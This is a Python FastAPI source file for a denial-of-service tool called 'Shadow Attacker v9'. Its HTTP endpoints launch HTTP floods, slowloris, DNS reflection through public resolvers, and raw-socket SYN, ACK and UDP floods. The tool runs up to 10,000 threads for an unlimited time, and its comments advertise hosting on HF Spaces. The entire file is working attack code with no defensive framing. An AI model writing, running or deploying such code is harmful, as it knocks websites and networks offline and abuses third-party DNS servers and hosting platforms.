# ============================================================== # SHADOW ATTACKER v9 – LAYER 7 + LAYER 4 + RAW | MAX HUNT MODE # ALL 14 ATTACKS | 500k+ PPS | -1 = 10,000 THREADS | HF SPACES # ============================================================== import random import socket import threading import time import struct from collections import deque from typing import Dict, Optional, List import uvicorn import requests from fastapi import FastAPI, HTTPException from pydantic import BaseModel, Field, validator from concurrent.futures import ThreadPoolExecutor # ------------------- LOGGING & STATE ------------------- import logging logging.basicConfig(level=logging.INFO, format="%(message)s") log = logging.getLogger() app = FastAPI(title="Shadow Attacker v9 - MAX HUNT") # Global state attack_active = False attack_lock = threading.Lock() executor: Optional[ThreadPoolExecutor] = None stop_event = threading.Event() counters: Dict[str, int] = {} counters_lock = threading.Lock() total_packets = 0 log_buffer: deque[str] = deque(maxlen=500) attack_end_time = 0.0 attack_type_name = "" # PPS tracking last_time = time.time() last_total = 0 def _log(msg: str): ts = time.strftime("%H:%M:%S") log.info(f"{ts} {msg}") log_buffer.append(f"{ts} {msg}") # ------------------- INIT EXECUTOR ------------------- def init_executor(): global executor if executor is None: executor = ThreadPoolExecutor(max_workers=10000) # ------------------- CONFIG MODELS ------------------- class AttackConfig(BaseModel): target: str = Field(..., description="Domain or IP") port: int = Field(80, ge=1, le=65535) duration: int = Field(300, ge=-1, le=10000) threads: int = Field(1000, ge=-1, le=10000) @validator('target') def validate_target(cls, v): if not v or len(v) > 255: raise ValueError("Invalid target") return v.strip() class Layer7Config(AttackConfig): method: str = Field("get") @validator('method') def validate_method(cls, v): valid = ["get", "post", "head", "cookie", "rand", "slowloris", "reflect"] if v not in valid: raise ValueError(f"L7 methods: {', '.join(valid)}") return v class Layer4Config(AttackConfig): protocol: str = Field("udp") payload_size: int = Field(1024, ge=0, le=65507) @validator('protocol') def validate_protocol(cls, v): if v not in ["udp", "tcp", "syn", "ack", "udp_pps"]: raise ValueError("L4: udp, tcp, syn, ack, udp_pps") return v # ------------------- STATUS MODEL ------------------- class StatusResponse(BaseModel): running: bool attack_type: Optional[str] target: Optional[str] total_packets: int pps: float threads_active: int duration: int elapsed: float remaining: float logs: List[str] # ------------------- RAW HELPERS ------------------- def checksum(data: bytes) -> int: s = 0 for i in range(0, len(data), 2): if i + 1 < len(data): w = (data[i] << 8) | data[i + 1] else: w = data[i] << 8 s += w while s >> 16: s = (s & 0xFFFF) + (s >> 16) return ~s & 0xFFFF def pseudo_checksum(src: bytes, dst: bytes, proto: int, length: int) -> int: s = 0 for i in range(0, 4, 2): s += (src[i] << 8) | src[i + 1] s += (dst[i] << 8) | dst[i + 1] s += proto s += length while s >> 16: s = (s & 0xFFFF) + (s >> 16) return s def build_ip_header(src_ip: bytes, dst_ip: bytes, proto: int, payload_len: int) -> bytes: total = 20 + payload_len ip = bytearray(20) ip[0] = 0x45 ip[8] = 64 ip[9] = proto struct.pack_into("!HH", ip, 2, total, random.randint(0, 0xFFFF)) ip[12:16] = src_ip ip[16:20] = dst_ip cs = checksum(ip) struct.pack_into("!H", ip, 10, cs) return bytes(ip) def build_tcp_packet(src_ip, dst_ip, src_p, dst_p, seq, ack, flags): tcp = bytearray(20) struct.pack_into("!HHIIBBHHH", tcp, 0, src_p, dst_p, seq, ack, 5 << 4, flags, 65535, 0, 0) pseudo = pseudo_checksum(src_ip, dst_ip, socket.IPPROTO_TCP, 20) cs = checksum(struct.pack("!I", pseudo) + tcp) struct.pack_into("!H", tcp, 16, cs) ip = build_ip_header(src_ip, dst_ip, socket.IPPROTO_TCP, 20) return ip + tcp def build_udp_packet(src_ip, dst_ip, src_p, dst_p, payload: bytes): udp_len = 8 + len(payload) udp = bytearray(8) struct.pack_into("!HHHH", udp, 0, src_p, dst_p, udp_len, 0) pseudo = pseudo_checksum(src_ip, dst_ip, socket.IPPROTO_UDP, udp_len) cs = checksum(struct.pack("!I", pseudo) + udp + payload) struct.pack_into("!H", udp, 6, cs) ip = build_ip_header(src_ip, dst_ip, socket.IPPROTO_UDP, udp_len) return ip + udp # ------------------- LAYER 7 WORKERS ------------------- def http_worker(method: str, url: str): global total_packets session = requests.Session() headers = { "User-Agent": random.choice(["Mozilla/5.0", "Chrome/120", "Safari/537", "Edge/120"]), "Cache-Control": "no-cache", "Connection": "keep-alive" } while not stop_event.is_set(): try: if method == "get": session.get(url, headers=headers, timeout=3, verify=False) elif method == "post": session.post(url, data={"x": random._urandom(128).hex()}, timeout=3) elif method == "head": session.head(url, headers=headers, timeout=3) elif method == "cookie": session.get(url, headers={**headers, "Cookie": f"s={random.randint(1,999999)}"}, timeout=3) elif method == "rand": session.request(random.choice(["GET","POST","PUT","DELETE"]), url, timeout=3) with counters_lock: counters["l7"] = counters.get("l7", 0) + 1 total_packets += 1 except: pass def slowloris(target: str, port: int): global total_packets while not stop_event.is_set(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target, port)) s.send(b"GET / HTTP/1.1\r\nHost: %s\r\n" % target.encode()) while not stop_event.is_set(): s.send(b"X-a: b\r\n") time.sleep(8) with counters_lock: counters["l7"] = counters.get("l7", 0) + 1 total_packets += 1 except: pass finally: try: s.close() except: pass def dns_reflect(target_ip: str): global total_packets servers = ["8.8.8.8", "1.1.1.1", "9.9.9.9", "208.67.222.222"] payload = b"\xaa\xaa\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x03www" + random._urandom(40) while not stop_event.is_set(): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) for srv in servers: s.sendto(payload, (srv, 53)) with counters_lock: counters["reflect"] = counters.get("reflect", 0) + 1 total_packets += 1 except: pass finally: try: s.close() except: pass # ------------------- LAYER 4 RAW FLOODERS ------------------- def raw_syn_flood(target_ip: str, port: int): global total_packets src_ip = socket.inet_aton("0.0.0.0") dst_ip = socket.inet_aton(target_ip) while not stop_event.is_set(): try: s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) src_p = random.randint(1024, 65535) pkt = build_tcp_packet(src_ip, dst_ip, src_p, port, random.randint(0, 2**32-1), 0, 0x02) s.sendto(pkt, (target_ip, 0)) with counters_lock: counters["raw"] = counters.get("raw", 0) + 1 total_packets += 1 except: pass finally: try: s.close() except: pass def raw_ack_flood(target_ip: str, port: int): global total_packets src_ip = socket.inet_aton("0.0.0.0") dst_ip = socket.inet_aton(target_ip) while not stop_event.is_set(): try: s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) src_p = random.randint(1024, 65535) pkt = build_tcp_packet(src_ip, dst_ip, src_p, port, random.randint(0, 2**32-1), random.randint(0, 2**32-1), 0x10) s.sendto(pkt, (target_ip, 0)) with counters_lock: counters["raw"] = counters.get("raw", 0) + 1 total_packets += 1 except: pass finally: try: s.close() except: pass def raw_udp_flood(target_ip: str, port: int, payload_size: int): global total_packets src_ip = socket.inet_aton("0.0.0.0") dst_ip = socket.inet_aton(target_ip) payload = random._urandom(payload_size) if payload_size > 0 else b"" while not stop_event.is_set(): try: s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1) src_p = random.randint(1024, 65535) pkt = build_udp_packet(src_ip, dst_ip, src_p, port, payload) s.sendto(pkt, (target_ip, 0)) with counters_lock: counters["raw"] = counters.get("raw", 0) + 1 total_packets += 1 except: pass finally: try: s.close() except: pass # ------------------- LAUNCHER ------------------- def resolve_ip(target: str) -> str: try: return socket.gethostbyname(target.split("/")[0].split(":")[0]) except: raise HTTPException(400, "Cannot resolve target") def launch_attack(config: AttackConfig, attack_type: str, **kwargs): global attack_active, attack_end_time, attack_type_name with attack_lock: if attack_active: raise HTTPException(400, "Attack in progress") attack_active = True stop_event.clear() counters.clear() total_packets = 0 attack_type_name = attack_type.upper() threads = 10000 if config.threads == -1 else config.threads duration = float('inf') if config.duration == -1 else config.duration attack_end_time = time.time() + duration if duration != float('inf') else float('inf') _log(f"LAUNCHED {attack_type.upper()} → {config.target}:{config.port} | {threads} threads | {config.duration}s") init_executor() worker = None target_ip = resolve_ip(config.target) # LAYER 7 if attack_type.startswith("l7_"): url = f"http://{config.target}:{config.port}" method = kwargs.get("method", "get") if method == "slowloris": worker = lambda: slowloris(target_ip, config.port) elif method == "reflect": worker = lambda: dns_reflect(target_ip) else: worker = lambda: http_worker(method, url) # LAYER 4 RAW elif attack_type == "raw_syn": worker = lambda: raw_syn_flood(target_ip, config.port) elif attack_type == "raw_ack": worker = lambda: raw_ack_flood(target_ip, config.port) elif attack_type == "raw_udp": worker = lambda: raw_udp_flood(target_ip, config.port, kwargs.get("payload_size", 1200)) elif attack_type == "raw_udp_pps": worker = lambda: raw_udp_flood(target_ip, config.port, 0) if not worker: raise HTTPException(400, "Invalid attack") for _ in range(threads): executor.submit(worker) if duration != float('inf'): def auto_stop(): time.sleep(duration) stop_attack() threading.Thread(target=auto_stop, daemon=True).start() # ------------------- ENDPOINTS ------------------- @app.post("/layer7/attack") def l7_attack(config: Layer7Config): attack_key = f"l7_{config.method}" launch_attack(config, attack_key, method=config.method) return {"status": f"L7 {config.method.upper()} HUNT STARTED"} @app.post("/layer4/attack") def l4_attack(config: Layer4Config): proto_map = { "udp": "raw_udp", "syn": "raw_syn", "ack": "raw_ack", "udp_pps": "raw_udp_pps" } attack_key = proto_map[config.protocol] launch_attack(config, attack_key, payload_size=config.payload_size) return {"status": f"L4 {config.protocol.upper()} HUNT STARTED"} @app.post("/stop") def stop_attack(): global attack_active with attack_lock: if not attack_active: return {"status": "no_attack"} stop_event.set() attack_active = False _log("HUNT STOPPED") return {"status": "stopped"} @app.get("/status", response_model=StatusResponse) def status(): global last_time, last_total now = time.time() elapsed_g = now - last_time pps = (total_packets - last_total) / elapsed_g if elapsed_g > 0 else 0 last_time, last_total = now, total_packets active_threads = sum(1 for t in threading.enumerate() if t.name != "MainThread") elapsed = now - (attack_end_time - (attack_end_time - now)) if attack_active else 0 remaining = max(0, attack_end_time - now) if attack_active and attack_end_time != float('inf') else -1 return StatusResponse( running=attack_active, attack_type=attack_type_name, target=None, total_packets=total_packets, pps=round(pps, 1), threads_active=active_threads, duration=int(attack_end_time - (time.time() - (attack_end_time - time.time()))) if attack_active else 0, elapsed=round(elapsed, 1), remaining=round(remaining, 1) if remaining >= 0 else -1, logs=list(log_buffer) ) @app.get("/attack/types") def attack_types(): return { "layer7": ["get", "post", "head", "cookie", "rand", "slowloris", "reflect"], "layer4": ["udp", "udp_pps", "syn", "ack"], "max_threads": "10000 (-1 = FULL HUNT)", "max_duration": "10000s (-1 = unlimited)" } @app.get("/") def root(): return {"message": "Shadow Attacker v9 - /attack/types for full arsenal"} # ------------------- START ------------------- if __name__ == "__main__": init_executor() uvicorn.run(app, host="0.0.0.0", port=8000, workers=1)